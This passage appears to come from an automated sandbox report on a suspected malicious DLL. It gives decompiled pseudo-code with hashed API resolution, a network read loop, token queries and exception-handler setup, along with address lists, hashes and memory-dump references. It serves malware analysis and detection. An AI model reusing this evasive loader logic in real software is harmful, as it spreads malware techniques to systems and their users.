					E6E7A50A0(_t139 + 0x44, _t139, 0x6e7b9424);
					E6E7A3B00(_t86, _t130);
					E6E7A7560(_t130, _t124, _t130);
					 *((char*)( *((intOrPtr*)(E6E7A7600(_t86, 0))))) = 0;
					_t143 = _t134[0xa] - 1;
					if(_t134[0xa] > 1) {
						 *(_t139 + 0xc) = _t134;
						_t128 = 1;
						_t133 = _t139 + 0x54;
						while(1) {
							_t79 = E6E7A7600(_t86, _t128);
							_push(1);
							_push(0x6e7ba9e0);
							E6E791BA0(_t143, _t133);
							_t81 = E6E7A0ED0(_t79, _t128,  *((intOrPtr*)(_t139 + 0x54)));
							E6E7A0B10(_t133);
							if(_t81 != 0) {
								break;
							}
							_t128 = _t128 + 1;
							if(_t128 <  *_t86) {
								continue;
							} else {
								_t134 =  *(_t139 + 0xc);
							}
							goto L6;
						}
						_t134 =  *(_t139 + 0xc);
						 *((char*)( *((intOrPtr*)(E6E7A7600(_t86, _t128))))) = 0;
					}
					L6:
					E6E7A3EC0(_t86);
					_push(0);
					E6E7A9350(_t139 + 0x10);
					_push(0x2800);
					E6E7A9350(_t139 + 0x20);
					while(1) {
						 *(_t139 + 0x5c) = 0;
						if(E6E7915C0(0xd27f045a, 0x547ac48e) == 0) {
							break;
						}
						_t60 = E6E7A9640(_t139 + 0x20, 0);
						_t63 = InternetReadFile(_t134[4], _t60, E6E7A9650(_t139 + 0x1c), _t139 + 0x5c); // executed
						__eflags = _t63;
						if(_t63 == 0) {
							_t64 = E6E797F00();
							__eflags = _t64;
							if(_t64 != 0) {
								L9:
								 *_t134 = _t64;
								E6E7A9510(_t139 + 0x1c);
								E6E7A9510(_t139 + 0xc);
								E6E798CA0(_t139 + 0x34);
								E6E798CA0(_t139 + 0x44);
								L14:
								E6E7A0B10(_t139 + 0x3c);
								_push(0);
								E6E7A9350( *((intOrPtr*)(_t139 + 0x78)));
								return  *((intOrPtr*)(_t139 + 0x74));
							} else {
								goto L11;
							}
						} else {
							L11:
							__eflags =  *(_t139 + 0x5c);
							if( *(_t139 + 0x5c) == 0) {
								_push(_t139 + 0xc);
								E6E7A93D0( *((intOrPtr*)(_t139 + 0x78)));
								E6E7A9510(_t139 + 0x1c);
								E6E7A9510(_t139 + 0xc);
								E6E798CA0(_t139 + 0x34);
								E6E798CA0(_t139 + 0x44);
								E6E7A0B10(_t139 + 0x3c);
								return  *((intOrPtr*)(_t139 + 0x74));
							} else {
								E6E7A9710(_t139 + 0x14, E6E7A9640(_t139 + 0x20, 0),  *(_t139 + 0x5c));
								continue;
							}
						}
						goto L22;
					}
					_t64 = 0x7f;
					goto L9;
				}
				L22:
			}

0x6e7b39f9
0x6e7b39f9
0x6e7b39fb
0x6e7b3c44
0x6e7b3c49
0x6e7b3c4b
0x6e7b3b6d
0x6e7b3b74
0x6e7b3b7d
0x00000000
0x6e7b3c51
0x00000000
0x6e7b3c51
0x6e7b3a01
0x6e7b3a01
0x6e7b3a09
0x6e7b3a16
0x6e7b3a1f
0x6e7b3a24
0x6e7b3a31
0x6e7b3a39
0x6e7b3a40
0x6e7b3a50
0x6e7b3a53
0x6e7b3a57
0x6e7b3a59
0x6e7b3a5d
0x6e7b3a62
0x6e7b3a66
0x6e7b3a69
0x6e7b3a70
0x6e7b3a72
0x6e7b3a78
0x6e7b3a83
0x6e7b3a8c
0x6e7b3a95
0x00000000
0x00000000
0x6e7b3a9b
0x6e7b3a9e
0x00000000
0x6e7b3aa0
0x6e7b3aa0
0x6e7b3aa0
0x00000000
0x6e7b3a9e
0x6e7b3c30
0x6e7b3c3c
0x6e7b3c3c
0x6e7b3aa4
0x6e7b3aa6
0x6e7b3aab
0x6e7b3ab1
0x6e7b3ab6
0x6e7b3abf
0x6e7b3ac4
0x6e7b3ac4
0x6e7b3adf
0x00000000
0x00000000
0x6e7b3b1b
0x6e7b3b35
0x6e7b3b37
0x6e7b3b39
0x6e7b3c1c
0x6e7b3c21
0x6e7b3c23
0x6e7b3ae6
0x6e7b3ae6
0x6e7b3aed
0x6e7b3af6
0x6e7b3aff
0x6e7b3b08
0x6e7b3bb1
0x6e7b3bb5
0x6e7b3bba
0x6e7b3bc0
0x6e7b3bd0
0x6e7b3c29
0x00000000
0x6e7b3c29
0x6e7b3b3f
0x6e7b3b3f
0x6e7b3b3f
0x6e7b3b44
0x6e7b3bd7
0x6e7b3bdc
0x6e7b3be5
0x6e7b3bee
0x6e7b3bf7
0x6e7b3c00
0x6e7b3c09
0x6e7b3c19
0x6e7b3b4a
0x6e7b3b5e
0x00000000
0x6e7b3b5e
0x6e7b3b44
0x00000000
0x6e7b3b39
0x6e7b3ae1
0x00000000
0x6e7b3ae1
0x00000000

APIs

InternetReadFile.WININET(?,00000000,00000000,00000000,00000000,D27F045A,547AC48E), ref: 6E7B3B35

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 3adb7e445bf8815628eb9ac10913e7c5547def4033119e05b19bbbc7c994e4a9
Instruction ID: 4da7b12733e6c574442a06d251555121651989525374f333b17cb10a982d821c
Opcode Fuzzy Hash: 3adb7e445bf8815628eb9ac10913e7c5547def4033119e05b19bbbc7c994e4a9
Instruction Fuzzy Hash: DE516031218204AFD704EFA8DE68AEFB3A9AF91748F504D2CF255471B0EF719949CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E7922A0, Relevance: 1.6, APIs: 1, Instructions: 69
nativeCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E6E7922A0(void* __ecx, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v24;
				intOrPtr* _t10;
				void* _t13;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr* _t22;
				intOrPtr* _t23;
				intOrPtr* _t24;

				_t19 = __edx;
				_t24 =  &_v8;
				if(__ecx == 0) {
					 *_t24 = 0;
					_v8 = 0;
				} else {
					 *_t24 = E6E791230(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v24 = _t19;
				}
				_t20 =  *0x6e7bb1f4; // 0xeb1340
				if(_t20 == 0xc139578) {
					 *0x6e7bb1f4 = 0;
					_t20 = 0;
				}
				if(_t20 == 0) {
					L10:
					_push(0x588ab3ea);
					_t10 = E6E797564(0x588ab3ea);
					_t23 = _t10;
					if(_t23 == 0) {
						_t10 = E6E796C50(0x588ab3ea);
						if(_t10 != 0) {
							_push(0x588ab3ea);
							_t10 = E6E797564(0x588ab3ea);
							_t23 = _t10;
						}
					}
					if(_t23 == 0) {
						goto L15;
					} else {
						_t24 = _t24 + 0xfffffff8;
						_t10 = E6E7967C8(_t23, 0xcd123e03);
						_t22 = _t10;
						goto L13;
					}
				} else {
					do {
						_t18 = 0;
						_t10 = 0;
						while( *((intOrPtr*)(_t10 + _t20 + 8)) != 0xcd123e03) {
							_t18 = _t18 + 1;
							_t10 = _t10 + 0x18;
							if(_t18 < 0x10) {
								continue;
							}
							goto L9;
						}
						_t22 =  *((intOrPtr*)(_t10 + _t20 + 0x14));
						if(_t22 != 0) {
							L13:
							if(_t22 == 0) {
								L15:
								return _t10;
							}
							_t13 =  *_t22(0, _t24); // executed
							return _t13;
						}
						goto L10;
						L9:
						asm("o16 nop [eax+eax]");
						_t5 = _t20 + 0x180; // 0xeb8e68
						_t20 =  *_t5;
					} while (_t20 != 0);
					goto L10;
				}
			}

0x6e7922a0
0x6e7922a1
0x6e7922a6
0x6e7922c2
0x6e7922c5
0x6e7922a8
0x6e7922b7
0x6e7922ba
0x6e7922ba
0x6e7922c9
0x6e7922d5
0x6e7922d7
0x6e7922e1
0x6e7922e1
0x6e7922e5
0x6e79230e
0x6e792313
0x6e792314
0x6e792319
0x6e79231d
0x6e79234a
0x6e792351
0x6e792358
0x6e792359
0x6e79235e
0x6e79235e
0x6e792351
0x6e792321
0x00000000
0x6e792323
0x6e79232a
0x6e79232d
0x6e792332
0x00000000
0x6e792332
0x6e7922e7
0x6e7922e7
0x6e7922e7
0x6e7922e9
0x6e7922eb
0x6e7922f5
0x6e7922f6
0x6e7922fc
0x00000000
0x00000000
0x00000000
0x6e7922fc
0x6e792362
0x6e792368
0x6e792334
0x6e792336
0x6e792344
0x6e792344
0x6e792344
0x6e79233e
0x00000000
0x6e79233e
0x00000000
0x6e7922fe
0x6e7922fe
0x6e792304
0x6e792304
0x6e79230a
0x00000000
0x6e7922e7

APIs

NtDelayExecution.NTDLL(00000000,00000000), ref: 6E79233E

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: eaa6893fa9997c1424cc461f32fdabefb664b694c8603408b01ffd6b8db74dc0
Instruction ID: a048f39e8ab739d1275608cc4e5aa061867e4d30ad795332deac0ef1b33093d6
Opcode Fuzzy Hash: eaa6893fa9997c1424cc461f32fdabefb664b694c8603408b01ffd6b8db74dc0
Instruction Fuzzy Hash: 62112C30B096835BD688BAE87F54B6A31DA6F41714F16C67CC811972B8EA30D800A791

Uniqueness

Uniqueness Score: -1.00%

Function 6E797A60, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6E797A60(intOrPtr* __ecx) {
				void* _t1;

				_push(E6E797D40);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6e797a60
0x6e797a65
0x6e797a67
0x6e797a69

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6E797D40,6E797A11,588AB3EA,?,?,6E785168,00000001), ref: 6E797A67

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: fb0e4ccc793b3560ec3baf38f791bf85f568f34c571b3a99b32ecb19c0d7eab5
Instruction ID: 5a892065dc9c3327cac2b504b653b5886e73c9d23113c7308328d4d5b7948039
Opcode Fuzzy Hash: fb0e4ccc793b3560ec3baf38f791bf85f568f34c571b3a99b32ecb19c0d7eab5
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6E7967C8, Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06a62edbf8aa33d23408526e66b7c3a381dbd3e9aefacaabc6483f22f2fbc06c
Instruction ID: 2c78a97d44b19d3daec999eecdad8e53c5e0412d0f346c8d50404379cea5c70a
Opcode Fuzzy Hash: 06a62edbf8aa33d23408526e66b7c3a381dbd3e9aefacaabc6483f22f2fbc06c
Instruction Fuzzy Hash: 5BC1D3706283468FD760DFD9E690B9A77E4FF81308F10863DC8988B225EB709645EBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7947B0, Relevance: 3.6, APIs: 2, Instructions: 618
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E6E7947B0(void* __ebx, intOrPtr __edi, intOrPtr __esi) {
				void* _t93;
				long _t99;
				void* _t109;
				int _t112;
				intOrPtr _t118;
				char _t133;
				intOrPtr _t141;
				void* _t144;
				void* _t149;
				intOrPtr _t150;
				intOrPtr _t155;
				void* _t158;
				void* _t161;
				intOrPtr _t163;
				void* _t166;
				void* _t169;
				int _t174;
				intOrPtr _t179;
				void* _t182;
				void* _t185;
				void* _t194;
				void* _t196;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t203;
				intOrPtr* _t205;
				void* _t206;
				long _t207;
				void* _t209;
				void* _t213;
				void* _t214;
				void* _t233;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t242;
				void* _t243;
				void* _t245;
				long _t246;
				intOrPtr* _t248;
				long _t249;
				long _t250;
				long _t253;
				long _t255;
				long _t258;
				long _t259;
				long _t261;
				intOrPtr _t266;
				long _t267;
				intOrPtr _t270;
				intOrPtr _t272;
				intOrPtr* _t273;
				intOrPtr _t277;
				intOrPtr* _t278;
				void* _t281;
				signed int _t283;
				void* _t284;
				void* _t285;

				_t272 = __esi;
				_t270 = __edi;
				_t285 = _t284 - 0x38;
				_t246 =  *0x6e7bb1f4; // 0xeb1340
				 *(_t285 + 0x34) = 0;
				if(_t246 == 0xc139578) {
					 *0x6e7bb1f4 = 0;
					goto L6;
				} else {
					if(_t246 == 0) {
						L6:
						_push(0x3ab94787);
						_t196 = E6E797564(0x3ab94787);
						if(_t196 == 0) {
							if(E6E796C50(0x3ab94787) != 0) {
								_push(0x3ab94787);
								_t196 = E6E797564(0x3ab94787);
							}
						}
						if(_t196 == 0) {
							goto L25;
						} else {
							_t285 = _t285 + 0xfffffff8;
							_t248 = E6E7967C8(_t196, 0xc17c5a6e);
							goto L9;
						}
					} else {
						do {
							_t245 = 0;
							_t194 = 0;
							while( *((intOrPtr*)(_t194 + _t246 + 8)) != 0xc17c5a6e) {
								_t245 = _t245 + 1;
								_t194 = _t194 + 0x18;
								if(_t245 < 0x10) {
									continue;
								} else {
									goto L5;
								}
								goto L186;
							}
							_t248 =  *((intOrPtr*)(_t194 + _t246 + 0x14));
							if(_t248 != 0) {
								L9:
								if(_t248 == 0) {
									L25:
									return 0;
								} else {
									_push(_t285 + 0x34);
									_push(8);
									_push(0xffffffff);
									if( *_t248() == 0) {
										_t93 = E6E797BF0(0xea5f6acc, _t272, 0xea5f6acc);
										if(_t93 != 0) {
											L174:
											if(_t93 == 0) {
												goto L178;
											} else {
												asm("int3");
												return _t93;
											}
										} else {
											_push(0xa1310f65);
											_t214 = E6E797564(0xa1310f65);
											if(_t214 == 0) {
												if(E6E796C50(0xa1310f65) != 0) {
													_push(0xa1310f65);
													_t214 = E6E797564(0xa1310f65);
												}
											}
											if(_t214 == 0) {
												L178:
												if(0 != 0) {
													goto L25;
												} else {
													goto L11;
												}
											} else {
												_t285 = _t285 + 0xfffffff8;
												_t93 = E6E7967C8(_t214, 0xea5f6acc);
												goto L174;
											}
										}
									} else {
										L11:
										_t249 =  *0x6e7bb1f4; // 0xeb1340
										 *(_t285 + 0x28) =  *(_t285 + 0x34);
										 *((char*)(_t285 + 0x2c)) = 1;
										 *(_t285 + 0x30) = 0;
										if(_t249 == 0xc139578) {
											 *0x6e7bb1f4 = 0;
											goto L17;
										} else {
											if(_t249 == 0) {
												L17:
												_push(0x3ab94787);
												_t198 = E6E797564(0x3ab94787);
												if(_t198 == 0) {
													if(E6E796C50(0x3ab94787) != 0) {
														_push(0x3ab94787);
														_t198 = E6E797564(0x3ab94787);
													}
												}
												if(_t198 == 0) {
													goto L22;
												} else {
													_t285 = _t285 + 0xfffffff8;
													_t266 = E6E7967C8(_t198, 0x2eeff4c6);
													goto L20;
												}
											} else {
												do {
													_t243 = 0;
													_t185 = 0;
													while( *((intOrPtr*)(_t185 + _t249 + 8)) != 0x2eeff4c6) {
														_t243 = _t243 + 1;
														_t185 = _t185 + 0x18;
														if(_t243 < 0x10) {
															continue;
														} else {
															goto L16;
														}
														goto L186;
													}
													_t266 =  *((intOrPtr*)(_t185 + _t249 + 0x14));
													if(_t266 != 0) {
														L20:
														if(_t266 == 0) {
															L22:
															_t99 =  *(_t285 + 0x30);
															if(_t99 != 0) {
																_push(_t99);
																E6E7A9350(_t285 + 4);
																_t250 =  *0x6e7bb1f4; // 0xeb1340
																if(_t250 == 0xc139578) {
																	 *0x6e7bb1f4 = 0;
																	goto L32;
																} else {
																	if(_t250 == 0) {
																		L32:
																		_push(0x3ab94787);
																		_t199 = E6E797564(0x3ab94787);
																		if(_t199 == 0) {
																			if(E6E796C50(0x3ab94787) != 0) {
																				_push(0x3ab94787);
																				_t199 = E6E797564(0x3ab94787);
																			}
																		}
																		if(_t199 == 0) {
																			goto L36;
																		} else {
																			_t285 = _t285 + 0xfffffff8;
																			_t277 = E6E7967C8(_t199, 0x2eeff4c6);
																			goto L35;
																		}
																	} else {
																		do {
																			_t239 = 0;
																			_t169 = 0;
																			while( *((intOrPtr*)(_t169 + _t250 + 8)) != 0x2eeff4c6) {
																				_t239 = _t239 + 1;
																				_t169 = _t169 + 0x18;
																				if(_t239 < 0x10) {
																					continue;
																				} else {
																					goto L31;
																				}
																				goto L186;
																			}
																			_t277 =  *((intOrPtr*)(_t169 + _t250 + 0x14));
																			if(_t277 != 0) {
																				L35:
																				if(_t277 != 0) {
																					_t109 = E6E7A9640(_t285 + 4, 0);
																					_t112 = GetTokenInformation( *(_t285 + 0x44), 2, _t109, E6E7A9650(_t285), _t285 + 0x30); // executed
																					if(_t112 == 0) {
																						_t253 =  *0x6e7bb1f4; // 0xeb1340
																						if(_t253 == 0xc139578) {
																							 *0x6e7bb1f4 = 0;
																							goto L131;
																						} else {
																							if(_t253 == 0) {
																								L131:
																								_push(0xa1310f65);
																								_t202 = E6E797564(0xa1310f65);
																								if(_t202 == 0) {
																									if(E6E796C50(0xa1310f65) != 0) {
																										_push(0xa1310f65);
																										_t202 = E6E797564(0xa1310f65);
																									}
																								}
																								if(_t202 == 0) {
																									goto L138;
																								} else {
																									_t285 = _t285 + 0xfffffff8;
																									_t163 = E6E7967C8(_t202, 0xea5f6acc);
																									goto L134;
																								}
																							} else {
																								do {
																									_t238 = 0;
																									_t166 = 0;
																									while( *((intOrPtr*)(_t166 + _t253 + 8)) != 0xea5f6acc) {
																										_t238 = _t238 + 1;
																										_t166 = _t166 + 0x18;
																										if(_t238 < 0x10) {
																											continue;
																										} else {
																											goto L130;
																										}
																										goto L186;
																									}
																									_t163 =  *((intOrPtr*)(_t166 + _t253 + 0x14));
																									if(_t163 != 0) {
																										L134:
																										if(_t163 == 0) {
																											L138:
																											if(0 != 0) {
																												goto L36;
																											} else {
																												goto L40;
																											}
																										} else {
																											asm("int3");
																											return _t163;
																										}
																									} else {
																										goto L131;
																									}
																									goto L186;
																									L130:
																									asm("o16 nop [eax+eax]");
																									_t70 = _t253 + 0x180; // 0xeb8e68
																									_t253 =  *_t70;
																								} while (_t253 != 0);
																								goto L131;
																							}
																						}
																					} else {
																						L40:
																						_t278 = E6E7A9640(_t285 + 4, 0);
																						_t118 =  *0x6e7ba148; // 0x0
																						 *((short*)(_t285 + 0x14)) =  *0x6e7ba14c & 0x0000ffff;
																						_t255 =  *0x6e7bb1f4; // 0xeb1340
																						 *(_t285 + 0x24) = 0;
																						 *((intOrPtr*)(_t285 + 0x10)) = _t118;
																						if(_t255 == 0xc139578) {
																							 *0x6e7bb1f4 = 0;
																							goto L46;
																						} else {
																							if(_t255 == 0) {
																								L46:
																								_push(0x3ab94787);
																								_t203 = E6E797564(0x3ab94787);
																								if(_t203 == 0) {
																									if(E6E796C50(0x3ab94787) != 0) {
																										_push(0x3ab94787);
																										_t203 = E6E797564(0x3ab94787);
																									}
																								}
																								if(_t203 == 0) {
																									goto L87;
																								} else {
																									_t285 = _t285 + 0xfffffff8;
																									_t205 = E6E7967C8(_t203, 0xff8924ad);
																									goto L49;
																								}
																							} else {
																								do {
																									_t237 = 0;
																									_t161 = 0;
																									while( *((intOrPtr*)(_t161 + _t255 + 8)) != 0xff8924ad) {
																										_t237 = _t237 + 1;
																										_t161 = _t161 + 0x18;
																										if(_t237 < 0x10) {
																											continue;
																										} else {
																											goto L45;
																										}
																										goto L186;
																									}
																									_t205 =  *((intOrPtr*)(_t161 + _t255 + 0x14));
																									if(_t205 != 0) {
																										L49:
																										if(_t205 == 0) {
																											L87:
																											E6E7A9510(_t285);
																											if( *((char*)(_t285 + 0x2c)) != 0) {
																												E6E7ABE30(_t285 + 0x28, _t272);
																											}
																											return 0;
																										} else {
																											_push(_t285 + 0x24);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0x220);
																											_push(0x20);
																											_push(2);
																											_push(_t285 + 0x10);
																											if( *_t205() == 0) {
																												_t258 =  *0x6e7bb1f4; // 0xeb1340
																												if(_t258 == 0xc139578) {
																													 *0x6e7bb1f4 = 0;
																													goto L107;
																												} else {
																													if(_t258 == 0) {
																														L107:
																														_push(0xa1310f65);
																														_t206 = E6E797564(0xa1310f65);
																														if(_t206 == 0) {
																															if(E6E796C50(0xa1310f65) != 0) {
																																_push(0xa1310f65);
																																_t206 = E6E797564(0xa1310f65);
																															}
																														}
																														if(_t206 == 0) {
																															goto L114;
																														} else {
																															_t285 = _t285 + 0xfffffff8;
																															_t155 = E6E7967C8(_t206, 0xea5f6acc);
																															goto L110;
																														}
																													} else {
																														do {
																															_t236 = 0;
																															_t158 = 0;
																															while( *((intOrPtr*)(_t158 + _t258 + 8)) != 0xea5f6acc) {
																																_t236 = _t236 + 1;
																																_t158 = _t158 + 0x18;
																																if(_t236 < 0x10) {
																																	continue;
																																} else {
																																	goto L106;
																																}
																																goto L186;
																															}
																															_t155 =  *((intOrPtr*)(_t158 + _t258 + 0x14));
																															if(_t155 != 0) {
																																L110:
																																if(_t155 == 0) {
																																	L114:
																																	if(0 != 0) {
																																		goto L87;
																																	} else {
																																		goto L51;
																																	}
																																} else {
																																	asm("int3");
																																	return _t155;
																																}
																															} else {
																																goto L107;
																															}
																															goto L186;
																															L106:
																															asm("o16 nop [eax+eax]");
																															_t63 = _t258 + 0x180; // 0xeb8e68
																															_t258 =  *_t63;
																														} while (_t258 != 0);
																														goto L107;
																													}
																												}
																											} else {
																												L51:
																												_t207 =  *(_t285 + 0x24);
																												if( *_t278 <= 0) {
																													L67:
																													if(_t207 == 0 || _t207 == 0xffffffff) {
																														_t133 = 1;
																													} else {
																														_t133 = 0;
																													}
																													if(_t133 != 0) {
																														L84:
																														E6E7A9510(_t285);
																														if( *((char*)(_t285 + 0x2c)) != 0) {
																															E6E7ABE30(_t285 + 0x28, _t272);
																														}
																														return 0;
																													} else {
																														_t259 =  *0x6e7bb1f4; // 0xeb1340
																														if(_t259 == 0xc139578) {
																															 *0x6e7bb1f4 = 0;
																															goto L79;
																														} else {
																															if(_t259 == 0) {
																																L79:
																																_push(0x3ab94787);
																																_t281 = E6E797564(0x3ab94787);
																																if(_t281 == 0) {
																																	if(E6E796C50(0x3ab94787) != 0) {
																																		_push(0x3ab94787);
																																		_t281 = E6E797564(0x3ab94787);
																																	}
																																}
																																if(_t281 == 0) {
																																	goto L84;
																																} else {
																																	_t285 = _t285 + 0xfffffff8;
																																	_t141 = E6E7967C8(_t281, 0x9d775c6);
																																	goto L82;
																																}
																															} else {
																																do {
																																	_t233 = 0;
																																	_t144 = 0;
																																	while( *((intOrPtr*)(_t144 + _t259 + 8)) != 0x9d775c6) {
																																		_t233 = _t233 + 1;
																																		_t144 = _t144 + 0x18;
																																		if(_t233 < 0x10) {
																																			continue;
																																		} else {
																																			goto L78;
																																		}
																																		goto L186;
																																	}
																																	_t141 =  *((intOrPtr*)(_t144 + _t259 + 0x14));
																																	if(_t141 != 0) {
																																		L82:
																																		if(_t141 == 0) {
																																			goto L84;
																																		} else {
																																			_push(_t207);
																																			asm("int3");
																																			return _t141;
																																		}
																																	} else {
																																		goto L79;
																																	}
																																	goto L186;
																																	L78:
																																	asm("o16 nop [eax+eax]");
																																	_t52 = _t259 + 0x180; // 0xeb8e68
																																	_t259 =  *_t52;
																																} while (_t259 != 0);
																																goto L79;
																															}
																														}
																													}
																												} else {
																													 *(_t285 + 0x18) = _t207;
																													 *((intOrPtr*)(_t285 + 0x1c)) = _t272;
																													_t273 = _t278;
																													 *((intOrPtr*)(_t285 + 0x20)) = _t270;
																													_t283 = 0;
																													do {
																														_t261 =  *0x6e7bb1f4; // 0xeb1340
																														if(_t261 == 0xc139578) {
																															 *0x6e7bb1f4 = 0;
																															goto L60;
																														} else {
																															if(_t261 == 0) {
																																L60:
																																_push(0x3ab94787);
																																_t209 = E6E797564(0x3ab94787);
																																if(_t209 == 0) {
																																	if(E6E796C50(0x3ab94787) != 0) {
																																		_push(0x3ab94787);
																																		_t209 = E6E797564(0x3ab94787);
																																	}
																																}
																																if(_t209 == 0) {
																																	goto L65;
																																} else {
																																	_t285 = _t285 + 0xfffffff8;
																																	_t150 = E6E7967C8(_t209, 0x68adfb76);
																																	goto L63;
																																}
																															} else {
																																do {
																																	_t235 = 0;
																																	_t149 = 0;
																																	while( *((intOrPtr*)(_t149 + _t261 + 8)) != 0x68adfb76) {
																																		_t235 = _t235 + 1;
																																		_t149 = _t149 + 0x18;
																																		if(_t235 < 0x10) {
																																			continue;
																																		} else {
																																			goto L59;
																																		}
																																		goto L186;
																																	}
																																	_t150 =  *((intOrPtr*)(_t149 + _t261 + 0x14));
																																	if(_t150 != 0) {
																																		L63:
																																		if(_t150 == 0) {
																																			goto L65;
																																		} else {
																																			_push( *((intOrPtr*)(_t273 + 4 + _t283 * 8)));
																																			_push( *(_t285 + 0x28));
																																			asm("int3");
																																			return _t150;
																																		}
																																	} else {
																																		goto L60;
																																	}
																																	goto L186;
																																	L59:
																																	asm("o16 nop [eax+eax]");
																																	_t42 = _t261 + 0x180; // 0xeb8e68
																																	_t261 =  *_t42;
																																} while (_t261 != 0);
																																goto L60;
																															}
																														}
																														goto L186;
																														L65:
																														_t283 = _t283 + 1;
																													} while (_t283 <  *_t273);
																													_t207 =  *(_t285 + 0x18);
																													_t272 =  *((intOrPtr*)(_t285 + 0x1c));
																													goto L67;
																												}
																											}
																										}
																									} else {
																										goto L46;
																									}
																									goto L186;
																									L45:
																									asm("o16 nop [eax+eax]");
																									_t33 = _t255 + 0x180; // 0xeb8e68
																									_t255 =  *_t33;
																								} while (_t255 != 0);
																								goto L46;
																							}
																						}
																					}
																				} else {
																					L36:
																					E6E7A9510(_t285);
																					if( *((char*)(_t285 + 0x2c)) != 0) {
																						E6E7ABE30(_t285 + 0x28, _t272);
																					}
																					return 0;
																				}
																			} else {
																				goto L32;
																			}
																			goto L186;
																			L31:
																			asm("o16 nop [eax+eax]");
																			_t21 = _t250 + 0x180; // 0xeb8e68
																			_t250 =  *_t21;
																		} while (_t250 != 0);
																		goto L32;
																	}
																}
															} else {
																if( *((char*)(_t285 + 0x2c)) != 0) {
																	E6E7ABE30(_t285 + 0x28, _t272);
																}
																goto L25;
															}
														} else {
															_t174 = GetTokenInformation( *(_t285 + 0x44), 2, 0, 0, _t285 + 0x30); // executed
															if(_t174 == 0) {
																_t267 =  *0x6e7bb1f4; // 0xeb1340
																if(_t267 == 0xc139578) {
																	 *0x6e7bb1f4 = 0;
																	goto L155;
																} else {
																	if(_t267 == 0) {
																		L155:
																		_push(0xa1310f65);
																		_t213 = E6E797564(0xa1310f65);
																		if(_t213 == 0) {
																			if(E6E796C50(0xa1310f65) != 0) {
																				_push(0xa1310f65);
																				_t213 = E6E797564(0xa1310f65);
																			}
																		}
																		if(_t213 == 0) {
																			goto L22;
																		} else {
																			_t285 = _t285 + 0xfffffff8;
																			_t179 = E6E7967C8(_t213, 0xea5f6acc);
																			goto L158;
																		}
																	} else {
																		do {
																			_t242 = 0;
																			_t182 = 0;
																			while( *((intOrPtr*)(_t182 + _t267 + 8)) != 0xea5f6acc) {
																				_t242 = _t242 + 1;
																				_t182 = _t182 + 0x18;
																				if(_t242 < 0x10) {
																					continue;
																				} else {
																					goto L154;
																				}
																				goto L186;
																			}
																			_t179 =  *((intOrPtr*)(_t182 + _t267 + 0x14));
																			if(_t179 != 0) {
																				L158:
																				if(_t179 == 0) {
																					goto L22;
																				} else {
																					asm("int3");
																					return _t179;
																				}
																			} else {
																				goto L155;
																			}
																			goto L186;
																			L154:
																			asm("o16 nop [eax+eax]");
																			_t77 = _t267 + 0x180; // 0xeb8e68
																			_t267 =  *_t77;
																		} while (_t267 != 0);
																		goto L155;
																	}
																}
															} else {
																goto L22;
															}
														}
													} else {
														goto L17;
													}
													goto L186;
													L16:
													asm("o16 nop [eax+eax]");
													_t12 = _t249 + 0x180; // 0xeb8e68
													_t249 =  *_t12;
												} while (_t249 != 0);
												goto L17;
											}
										}
									}
								}
							} else {
								goto L6;
							}
							goto L186;
							L5:
							asm("o16 nop [eax+eax]");
							_t4 = _t246 + 0x180; // 0xeb8e68
							_t246 =  *_t4;
						} while (_t246 != 0);
						goto L6;
					}
				}
				L186:
			}

0x6e7947b0
0x6e7947b0
0x6e7947b2
0x6e7947b5
0x6e7947bb
